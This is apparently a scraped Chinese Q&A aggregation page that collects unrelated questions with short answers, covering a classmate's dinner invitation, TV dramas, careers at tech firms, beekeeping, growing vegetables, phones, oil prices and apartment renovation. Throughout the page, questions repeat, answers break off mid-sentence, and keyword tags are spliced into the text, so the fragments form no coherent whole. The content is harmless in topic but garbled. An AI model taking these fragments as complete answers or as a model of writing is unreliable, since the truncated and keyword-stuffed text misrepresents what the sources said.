初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

初中 同學:初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩? 吃飯 許久未見,意思就是交情不怎麼樣,無功不受祿,人家憑什麼那麼熱情,難道真的是多年一來忘不了咱們之間的同學情誼,倍感想念了嗎,不是請幫忙、做業務、就是借錢,十有八九十借錢。我建議還是不要去的好,大家都很忙:-許久未見

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

出口 心理:現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理? 愛你 更多的是心裡問題,可能對方還沒有優秀到你滿意的程度,更沒有到那種離不開的地步!愛情最終還是要回歸生活,而生活離不開兩個人的相處,父母終究會老,孩子終究會飛,所以選擇自己的伴侶尤為重要,你現在覺得噁心更:-喜歡你

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

再見王瀝川 好看:劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢? 《遇見王瀝川》吧,高以翔的王瀝川太招人稀罕了。長相,身材,家世,人品,才能樣樣好,簡直完美,挑不出任何毛病,實在要說一個缺點的話,那就是太tm完美,天妒英才、才讓他飽受病魔折磨。偶像劇、深情帥氣的男主:-何以笙簫默

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

學歷是求職必備條件。有了工作不能停止對知識的探索。更高的學歷,可以讓你有更專業的技術能力和學習能力,可以讓你拓展自己的交際圈,可以讓你更知名。總之,活到老,學到老,學習對人總是有好處的,技多不壓身嘛!:-字節 跳動:計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研? 讀研 計算機專業

生完二胎的你們,現在有什麼感想?

生完二胎的你們,現在有什麼感想?

二胎家庭日常是什麼樣的?是不是覺得家裡多了一個小人兒,溫馨多了?不存在的!生二胎根本是媽媽們的渡劫磨礪!以前週末睡到自然醒,現在全年無休,時刻警醒著,能睡一次懶覺跟過年似的,黑眼圈不說,頭髮呼啦啦地掉:-生完 二胎 感想:生完二胎的你們,現在有什麼感想?

華北適合種植蠶豆嗎?

華北適合種植蠶豆嗎?

華北適合種植蠶豆,種蠶豆的面積大,在西北,華北,都在種植蠶豆,蠶豆莖稈根部有根瘤菌是種植其它農作物的好茬地,特別是土壤培養和防病蟲害起到作用。:-蠶豆 種植 適合:華北適合種植蠶豆嗎? 華北

華為手機更新EMUI10.1系統後效果咋樣?

華為手機更新EMUI10.1系統後效果咋樣?

大家知道現在智能手機的性能不僅僅跟智能手機的硬件有關,還跟智能手機的系統軟件息息相關,在國產智能手機操作系統裡,小米的MIUI系統跟華為的EMUI系統都是比較優秀的操作系統。最近小米推出了小米MIUI:-咋樣 華為 華為手機 更新:華為手機更新EMUI10.1系統後效果咋樣?

大熱天蜜蜂老是爬到箱外結群正常嗎?

大熱天蜜蜂老是爬到箱外結群正常嗎?

蜜蜂 爬到:大熱天蜜蜂老是爬到箱外結群正常嗎? 盜蜂現在正是夏季,很多地方蜜源稀少,蜂群中可能缺蜜,也是胡蜂猖獗的時間,所以蜂群中是非常容易發生盜蜂的。在蜂群中發生盜蜂的時候,蜂群守衛蜂會增多,但是這種情況引發的蜜蜂在蜂箱外一般不會結團,只是蜜蜂來:-大熱天

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

最佳期 霧都山客來回答您的問題。最近山客家鄉的村民正在進行辣椒移栽,確實有像題主提到的情形,辣椒苗移栽前長勢蔥蔥,嫩綠喜人,但是移栽後幾天內就出現萎蔫現象,細心觀察也不是被病蟲害危害。那究竟是什麼原因導致辣椒:-苗蔫 辣椒 咋回事:辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

手機相機發展的最終形態會是怎樣的?

手機相機發展的最終形態會是怎樣的?

最近這幾年手機在電子產品行業裡可謂是發展速度非常快,蘋果和華為兩大公司可以說也是,明爭暗鬥,產品一次比一次有賣點,前一段時間華為和蘋果還都推出了手機新品,兩家都在大力宣傳強調著拍照功能,像iPhone:-形態 相機 手機 最終:手機相機發展的最終形態會是怎樣的?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

5寸 手機 支持:華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧? 很高興回答你的問題,刷頭條刷出來的問題,看到很多人回答,感覺還有一些觀點沒有寫出,所以我來回答一下。首先,華為為什麼不出小尺寸全面屏手機?其實並不只有華為一家沒有出小屏手機,放眼近期各大手機廠商發佈的:-華為

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

胡蘿蔔 蔬菜:生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢? 第一種,黃瓜。這個瓜,可不是菜市場中堆放滿滿的青瓜。各位可要睜大眼睛看清楚了,這個黃瓜,青中帶黃,品種屬以前鄉下農戶少量種植的,形態上面來看這種瓜矮、短、圓,表面覆蓋有比較淡的細毛,經水輕輕沖洗之後整:-山芋

為什麼馬鈴薯不宜過早過遲播種?

為什麼馬鈴薯不宜過早過遲播種?

不宜:為什麼馬鈴薯不宜過早過遲播種? 播種 過早 為什麼馬鈴薯不宜過早過遲播種?馬鈴薯的種植主要是由於氣候條件的限制,過早出苗後容易遇到低溫被凍死,種植晚了容易遇到乾旱和高溫,影響產量。馬鈴薯種植時間的早晚必須根據種植地方的氣候條件來確定。馬鈴薯生長:-馬鈴薯

疫情愈發嚴重,原油為何反而大漲?

原油 愈發:疫情愈發嚴重,原油為何反而大漲? 疫情愈發嚴重和原油大漲沒有必然關係。但是資金總是從高處流向低處,原油價格跌的越多,投資價值越明顯,相對於其他產業更有投資價值。舉個例子:深圳南山房價均價大約6萬左右,寶安均價5萬左右,如果南山房價漲到:-疫情

生菜球很好吃,怎麼種植才能高產呢?

生菜球很好吃,怎麼種植才能高產呢?

種植:生菜球很好吃,怎麼種植才能高產呢? 高產 對環境條件的要求、1.溫度生菜球為喜冷涼、忌高溫作物,種子在4度以上可發芽、以15~20度為發芽適溫。幼苗能耐較低溫度,日平均溫度12度時生長壯健,葉球生長最適溫度為13~16度。不過目前有些結球生菜:-生菜

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

看下 這個戶型三房改四房,改一個小房間,應該沒有問題。△原戶型圖這個戶型改四房,能改的方案比較多,但是修改以後是否好用,是一件值得考慮的事情。一、主臥室變為兩個臥室可以將主臥室改為兩個臥室,但是這樣的改動佔:-房改 122:裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ? 144

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

房子:大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好? 這個戶型砸牆,當然可以砸牆,但是在砸牆之前,要搞清楚為什麼要砸牆,砸牆以後有什麼優劣。△原戶型原戶型圖上的白色牆體部分不是承重牆,理論上說否可以砸掉。但是外牆和與旁邊戶型或者是公共區域的共用牆體和圖上:-幫忙

意蜂夏季喝什麼水降溫?

意蜂夏季喝什麼水降溫?

降溫 意蜂夏季喝什麼水降溫?氣溫高,蜂巢溫度高的情況下,蜜蜂是通過採水的辦法掛在蜂箱的四壁來蒸發帶走熱量,降低蜂巢溫度 同時也能幫助蜂群維持正常的溼度。在平常的情況下,蜜蜂是在室外採自然水的。夏季消耗的水量:-意蜂 夏季:意蜂夏季喝什麼水降溫?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子:黃瓜種子催芽後種植需要打底水嗎? 你好很高興回答這個問題。答案:不用。1-2天可出芽。黃瓜種子催芽:選用飽滿的種子,用30℃水浸泡4小時後催芽。也可用100倍福爾馬林溶液浸泡種子10-20分鐘,洗淨後清水浸種3-4小時,然後於25-3:-催芽 黃瓜 打底

書友們展示一下自我感覺發揮較好的作品,一起學習?

書友們展示一下自我感覺發揮較好的作品,一起學習?

自我 較好 這幅作品是參賽的,色彩的搭配,紙張的拼接都是自己設計完成的,一如既往的清新淡雅感覺。書體用的魏碑中楷書,增加了書寫的趣味性。:-書友 展示:書友們展示一下自我感覺發揮較好的作品,一起學習?